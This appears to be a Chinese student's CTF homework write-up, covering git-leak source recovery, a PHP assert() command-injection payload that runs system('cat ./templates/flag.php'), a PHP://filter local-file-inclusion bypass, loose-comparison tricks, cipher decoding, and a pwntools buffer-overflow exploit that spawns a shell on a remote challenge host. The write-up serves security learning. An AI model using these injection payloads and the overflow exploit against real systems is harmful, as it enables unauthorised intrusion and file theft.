主页 > 电脑硬件  > 

1.20作业

1.20作业
1 mfw(git泄露)

./git,原本以为点了链接下了index文件,就可以打开看源码,结果解析不了

老老实实用了githacker

githacker --url      --output 1

assert()

断言(assert)的用法 | 菜鸟教程

命令注入:

/?page=').system('cat ./templates/flag.php');//

assert("strpos('templates/') or system('cat ./templates/flag.php');

//.php', '..') === false") or die("Detected hacking attempt!");

2 salted

base64解密,开头就是salted(AES DES RC4 Rabbit TripleDes)

试了试是Rabbit

全是大写,base32解码;python转字符

hex_string='' flag_string= ''.join(chr(int(hex_string[i:i+2], 16)) for i in range(0, len(hex_string), 2)) print(flag_string)

3 simple_php(松散比较)

>==,!==,(<>不等于,大于小于是松散比较)

​​

(字符串和数字admin,1admin)(科学计数法0)(ture与非零字符串都是ture)

?a=0abc&b=1235abc

Web_php_include

​strstr()函数:大小写敏感,用大写的PHP://来绕过过滤

/?page=PHP://filter/read=convert.base64-encode/resource=fl4gisisish3r3.php

4 传感器2​

百度一种可能:曼彻斯特编码

搜了搜wp:解析曼彻斯特编码实战-CSDN博客

删除3E可能是因为温度传感器解码后报文第一个字节为起始位,并无数据,因此从第二个字节开始,得到传感器1中两个解码后的报文有效数据为为0x24d8893ca584100和0x24d8845abf34100

最后一个字节是校验位

然后涉及CRC校验攻防世界 Misc高手进阶区 7分题 传感器2_攻防世界传感器2-CSDN博客

5ezstack

·打开环境,nc连接checksec用相应ida打开附件:

1.定义了一个字符串v4且距离栈底0x20,有gets函数(危险,可通过此函数进行溢出)

2.发现/bin/sh地址,通过get函数【溢出到此处】,获取权限

from pwn import*

p=remote("node4.anna.nssctf ",28968)

payload=b'b'*(0x20+8)+p64(0x400730)

p.sendline(payload)

p.interactive()

标签:

1.20作业由讯客互联电脑硬件栏目发布,感谢您对讯客互联的认可,以及对我们原创作品以及文章的青睐,非常欢迎各位朋友分享到个人网站或者朋友圈,但转载请说明文章出处“1.20作业